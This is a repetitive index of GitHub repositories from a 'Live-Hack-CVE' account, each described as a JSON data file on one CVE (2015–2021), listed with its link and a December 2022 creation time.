**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0382 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0382](https://github.com/Live-Hack-CVE/CVE-2015-0382) create time: 2022-12-26T05:23:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2126](https://github.com/Live-Hack-CVE/CVE-2016-2126) create time: 2022-12-26T06:03:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6207](https://github.com/Live-Hack-CVE/CVE-2016-6207) create time: 2022-12-26T05:32:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2125 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2125](https://github.com/Live-Hack-CVE/CVE-2016-2125) create time: 2022-12-26T05:32:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5385](https://github.com/Live-Hack-CVE/CVE-2016-5385) create time: 2022-12-26T05:31:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2123](https://github.com/Live-Hack-CVE/CVE-2016-2123) create time: 2022-12-26T05:31:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2119 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2119](https://github.com/Live-Hack-CVE/CVE-2016-2119) create time: 2022-12-26T05:31:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2118](https://github.com/Live-Hack-CVE/CVE-2016-2118) create time: 2022-12-26T05:31:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10159](https://github.com/Live-Hack-CVE/CVE-2016-10159) create time: 2022-12-26T05:29:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5172 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5172](https://github.com/Live-Hack-CVE/CVE-2016-5172) create time: 2022-12-26T05:29:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5628](https://github.com/Live-Hack-CVE/CVE-2016-5628) create time: 2022-12-26T05:29:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5634](https://github.com/Live-Hack-CVE/CVE-2016-5634) create time: 2022-12-26T05:29:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5631](https://github.com/Live-Hack-CVE/CVE-2016-5631) create time: 2022-12-26T05:29:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5633](https://github.com/Live-Hack-CVE/CVE-2016-5633) create time: 2022-12-26T05:29:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5632](https://github.com/Live-Hack-CVE/CVE-2016-5632) create time: 2022-12-26T05:28:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5635 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5635](https://github.com/Live-Hack-CVE/CVE-2016-5635) create time: 2022-12-26T05:28:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0651](https://github.com/Live-Hack-CVE/CVE-2016-0651) create time: 2022-12-26T05:25:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0642](https://github.com/Live-Hack-CVE/CVE-2016-0642) create time: 2022-12-26T05:25:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9118](https://github.com/Live-Hack-CVE/CVE-2017-9118) create time: 2022-12-26T06:03:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2619 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2619](https://github.com/Live-Hack-CVE/CVE-2017-2619) create time: 2022-12-26T05:31:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12150 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12150](https://github.com/Live-Hack-CVE/CVE-2017-12150) create time: 2022-12-26T05:29:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-15275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-15275](https://github.com/Live-Hack-CVE/CVE-2017-15275) create time: 2022-12-26T05:29:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-17590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-17590](https://github.com/Live-Hack-CVE/CVE-2017-17590) create time: 2022-12-26T05:29:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3732 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3732](https://github.com/Live-Hack-CVE/CVE-2017-3732) create time: 2022-12-26T05:29:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3464](https://github.com/Live-Hack-CVE/CVE-2017-3464) create time: 2022-12-26T05:27:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3651](https://github.com/Live-Hack-CVE/CVE-2017-3651) create time: 2022-12-26T05:27:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-14463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-14463](https://github.com/Live-Hack-CVE/CVE-2018-14463) create time: 2022-12-26T06:09:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-14520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-14520](https://github.com/Live-Hack-CVE/CVE-2018-14520) create time: 2022-12-26T06:09:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-14519 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-14519](https://github.com/Live-Hack-CVE/CVE-2018-14519) create time: 2022-12-26T06:09:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16851 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16851](https://github.com/Live-Hack-CVE/CVE-2018-16851) create time: 2022-12-26T06:03:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19935](https://github.com/Live-Hack-CVE/CVE-2018-19935) create time: 2022-12-26T06:03:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16841](https://github.com/Live-Hack-CVE/CVE-2018-16841) create time: 2022-12-26T05:32:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1057 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1057](https://github.com/Live-Hack-CVE/CVE-2018-1057) create time: 2022-12-26T05:31:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7164](https://github.com/Live-Hack-CVE/CVE-2018-7164) create time: 2022-12-26T05:31:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7158 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7158](https://github.com/Live-Hack-CVE/CVE-2018-7158) create time: 2022-12-26T05:30:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-12116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-12116](https://github.com/Live-Hack-CVE/CVE-2018-12116) create time: 2022-12-26T05:30:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-7167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-7167](https://github.com/Live-Hack-CVE/CVE-2018-7167) create time: 2022-12-26T05:30:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-0734 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-0734](https://github.com/Live-Hack-CVE/CVE-2018-0734) create time: 2022-12-26T05:30:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-0735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-0735](https://github.com/Live-Hack-CVE/CVE-2018-0735) create time: 2022-12-26T05:30:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1195](https://github.com/Live-Hack-CVE/CVE-2018-1195) create time: 2022-12-26T05:29:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1139](https://github.com/Live-Hack-CVE/CVE-2018-1139) create time: 2022-12-26T05:29:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3058 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3058](https://github.com/Live-Hack-CVE/CVE-2018-3058) create time: 2022-12-26T05:27:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2813 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2813](https://github.com/Live-Hack-CVE/CVE-2018-2813) create time: 2022-12-26T05:27:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3066 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3066](https://github.com/Live-Hack-CVE/CVE-2018-3066) create time: 2022-12-26T05:27:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14902 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14902](https://github.com/Live-Hack-CVE/CVE-2019-14902) create time: 2022-12-26T06:03:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3880 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3880](https://github.com/Live-Hack-CVE/CVE-2019-3880) create time: 2022-12-26T06:03:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19246 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19246](https://github.com/Live-Hack-CVE/CVE-2019-19246) create time: 2022-12-26T06:03:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11047](https://github.com/Live-Hack-CVE/CVE-2019-11047) create time: 2022-12-26T05:31:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2739 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2739](https://github.com/Live-Hack-CVE/CVE-2019-2739) create time: 2022-12-26T05:28:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15297](https://github.com/Live-Hack-CVE/CVE-2019-15297) create time: 2022-12-26T05:24:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27798](https://github.com/Live-Hack-CVE/CVE-2020-27798) create time: 2022-12-26T06:11:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27797 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27797](https://github.com/Live-Hack-CVE/CVE-2020-27797) create time: 2022-12-26T06:11:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27800](https://github.com/Live-Hack-CVE/CVE-2020-27800) create time: 2022-12-26T06:11:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27799](https://github.com/Live-Hack-CVE/CVE-2020-27799) create time: 2022-12-26T06:11:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27801](https://github.com/Live-Hack-CVE/CVE-2020-27801) create time: 2022-12-26T06:11:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27802](https://github.com/Live-Hack-CVE/CVE-2020-27802) create time: 2022-12-26T06:10:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7064 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7064](https://github.com/Live-Hack-CVE/CVE-2020-7064) create time: 2022-12-26T05:32:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7071 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7071](https://github.com/Live-Hack-CVE/CVE-2020-7071) create time: 2022-12-26T05:32:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10700 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10700](https://github.com/Live-Hack-CVE/CVE-2020-10700) create time: 2022-12-26T05:32:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17049](https://github.com/Live-Hack-CVE/CVE-2020-17049) create time: 2022-12-26T05:31:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1971 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1971](https://github.com/Live-Hack-CVE/CVE-2020-1971) create time: 2022-12-26T05:30:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11080 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11080](https://github.com/Live-Hack-CVE/CVE-2020-11080) create time: 2022-12-26T05:29:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14550](https://github.com/Live-Hack-CVE/CVE-2020-14550) create time: 2022-12-26T05:28:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2752](https://github.com/Live-Hack-CVE/CVE-2020-2752) create time: 2022-12-26T05:27:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2814](https://github.com/Live-Hack-CVE/CVE-2020-2814) create time: 2022-12-26T05:25:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2812 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2812](https://github.com/Live-Hack-CVE/CVE-2020-2812) create time: 2022-12-26T05:25:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0891](https://github.com/Live-Hack-CVE/CVE-2021-0891) create time: 2022-12-26T06:09:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0947](https://github.com/Live-Hack-CVE/CVE-2021-0947) create time: 2022-12-26T06:09:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0946](https://github.com/Live-Hack-CVE/CVE-2021-0946) create time: 2022-12-26T06:09:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39815](https://github.com/Live-Hack-CVE/CVE-2021-39815) create time: 2022-12-26T06:09:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43309](https://github.com/Live-Hack-CVE/CVE-2021-43309) create time: 2022-12-26T06:09:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4213](https://github.com/Live-Hack-CVE/CVE-2021-4213) create time: 2022-12-26T06:09:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4204](https://github.com/Live-Hack-CVE/CVE-2021-4204) create time: 2022-12-26T06:09:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4178 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4178](https://github.com/Live-Hack-CVE/CVE-2021-4178) create time: 2022-12-26T06:08:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4155 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4155](https://github.com/Live-Hack-CVE/CVE-2021-4155) create time: 2022-12-26T06:08:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4142 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4142](https://github.com/Live-Hack-CVE/CVE-2021-4142) create time: 2022-12-26T06:06:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4125 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4125](https://github.com/Live-Hack-CVE/CVE-2021-4125) create time: 2022-12-26T06:06:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4122](https://github.com/Live-Hack-CVE/CVE-2021-4122) create time: 2022-12-26T06:05:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4041 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4041](https://github.com/Live-Hack-CVE/CVE-2021-4041) create time: 2022-12-26T06:05:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4028 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4028](https://github.com/Live-Hack-CVE/CVE-2021-4028) create time: 2022-12-26T06:05:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20224](https://github.com/Live-Hack-CVE/CVE-2021-20224) create time: 2022-12-26T06:05:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4040 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4040](https://github.com/Live-Hack-CVE/CVE-2021-4040) create time: 2022-12-26T06:05:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3669 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3669](https://github.com/Live-Hack-CVE/CVE-2021-3669) create time: 2022-12-26T06:05:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3670 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3670](https://github.com/Live-Hack-CVE/CVE-2021-3670) create time: 2022-12-26T06:04:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3798](https://github.com/Live-Hack-CVE/CVE-2021-3798) create time: 2022-12-26T06:04:16Z

